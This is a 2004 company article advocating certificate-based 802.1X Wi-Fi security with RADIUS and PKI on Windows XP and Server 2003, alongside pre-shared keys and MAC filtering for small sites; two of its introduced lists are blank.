Securing Wireless LAN’s:
A Certificate Based Approach to WI-FI Security

Laptops, Tablet PC’s, PDA’s, and now Tower PC’s are coming equipped with WI-FI as a standard component. Many organizations have tested WI-FI in there enterprise but have shied away from large deployments or banned their use altogether. For traveling users, WI-FI is a fact, particularly in hotels. Given the choice of dial-up or high-speed, most users opt for speed. WI-FI now has many productivity and technology benefits, but its poor security record has prevented many organizations from deployments. So, how do you come up with an end-to-end solution that you can keep secure and let your organization take advantage of this prolific technology? That just happens to be the focus of this article.

Main Security Threats for WI-FI
Since the beginning of WLAN’s / WI-FI, the security threats have been basically the same:

 

The Benefits of WI-FI
The benefits of WLAN technology can be broken down into two main categories, operational benefits and those which affect core business practices. Core business benefits include improved employee productivity, quicker and more efficient business processes, and greater potential for creating entirely new business functions. Everyone knows that improved efficiency has the potential for adding profit to the bottom line
• Mobile workers stay connected while moving between offices
• Not tethered by a cable and can stay in touch wherever they are
• Online information is always available.
• Organizational flexibility is also enhanced.
• Integration of new devices and applications

Different organizations will experience different benefits; which of these are relevant to your organization depends on many factors such as the nature of your business and the size and geographic distribution of the workforce. The main operational benefits of WI-FI technology is lower capital and operational costs. This is accomplished by
• The cost of provisioning network access to buildings is substantially lowered.
• You can easily scale the network to respond to different levels of demand as the organization changes, even from day-to-day, if required
• Capital cost no longer is tied to building infrastructure because you can move your wireless network infrastructure to a new building relatively easily.

A Secure Wireless Solution?
It is important that any implementation of WI-FI works, based on technologies of the day. It is equally important that the solution that encompasses design, planning, building, and configuration as well as ongoing monitoring, maintenance, and management of the solution, to insure that it is safe, productive and secure. But what are the qualifications and the specifications for such a system? Is it possible to have something that works in the wireless world and remains secure enough to keep those of us in the IT world happy? Yes, thankfully there is such a solution.

Wireless LAN Security?
WI-FI has struggled with weaknesses since its inception. Analysts and network security firms have been striving to resolve them those weaknesses and have contributed significantly to improved wireless security. Unfortunately, WI-FI still has had its share of flaws. While all this work at improving WI-FI security has progressed, the Institute of Electrical and Electronic Engineers (IEEE) and other standards organizations have redefined and improved wireless security standards to enable WI-FI to stand up to the hostile security environment of the early twenty-first century. These efforts have not gone unrewarded and have resulted in “WLAN security” is no longer being considered an oxymoron. It is now possible to deploy and use WI-FI with a high level of confidence in their security, as long as you do not deploy an out of the box default solution.

What are the keys to this Secure Install?
The keys are truly the keys to a secure WI-FI deployment, at least in the small scale implementation, a Pre-shared keys, that is. By implementing PSK usage and making sure that
the Wireless Access Point (WAP) accepts connections only from WI-FI cards with designated
MAC addresses and is not broadcasting its SID to the world, the small organization can create
a WI-FI presence that is reasonably secure. It is possible to create a solution that uses only passwords for security, but this solution is an unlikely one for maintaining security as simple passwords can be cracked, particularly when they are traveling through the air on radio waves! The third and most secure method uses certificate-based security. This requires organizations deploy security certificates

Why is 802.1X SO MUCH Better at Security?
All of the improvements designed by analysts and the standards organizations have gone into this implementation. The end result is that the system deals with many of the items that were such security threats in the early implementations of WI-FI:
 

Increased Investment in the Network
In order to have a secured installation, you need to have a RADIUS (Remote Authentication Dial-In User Service) infrastructure and a public key infrastructure (PKI). This is a flexible design and is suited for organizations of several hundred to many thousands of wireless network users. The use of the RADIUS and PKI components were intentionally designed to be reusable in other network applications. This means that with a single implementation, you have the tools in place for authentication required by remote access VPN and other security applications, i.e. Encrypting File System, etc. The implementation of this solution requires the use of secure clients and secure servers, that is Microsoft® Windows® XP clients and Microsoft Windows Server™ 2003 servers including Active Directory® directory service domain controllers.

Where Can I Find Out More?
There are many sites on the web that give some very good information on Securing WI-FI, but one of the best is at Microsoft. They have put together a series of documents that can be used as a guide or ‘cookbook’ to creating a secure wireless environment. Much of the information referenced here in this article came from the documents at this site. They are very thorough and are tested and verified to work, unlike much of the theoretical material you can find on the web. Securing Wireless LANs with Certificate Services is the title of the page and can be viewed at http://www.microsoft.com/downloads/details.aspx?FamilyId=CDB639B3-010B-47E7-B234-A27CDA291DAD&displaylang=en . Many other sites can also be found, with many different opinions by using your favorite search engine and looking for ‘WI-FI security’. If you have questions or comments about this article, contact me (JohnBoline@hagerman.com).


 

All product names / logos, company names / logos are copyrights of their respective holders. John Boline is an MCSE, CNE, USE and a member of the Network Professional Association. The content herein is often based on late-breaking events. Much of the material is based on information from sources that are believed to be reliable. Hagerman & Company, Inc. disclaims all warranties as to the ultimate accuracy or completeness of the information. Hagerman & Company, Inc. and its employees shall have no liability for errors, omissions or inadequacies in the information contained within this article or for any interpretations thereof. The recommendations, positions and best practice policies outlined herein represent Hagerman & Company, Inc. initial analysis and therefore are subject to change as further information which may have bearing on these positions is made available. The reader assumes sole responsibility for the selection of these materials to achieve its intended results. The opinions expressed herein are subject to change without notice. Entire contents © 2004 Hagerman & Company, Inc. All rights reserved. Reproduction of this publication in any form without prior written permission is forbidden.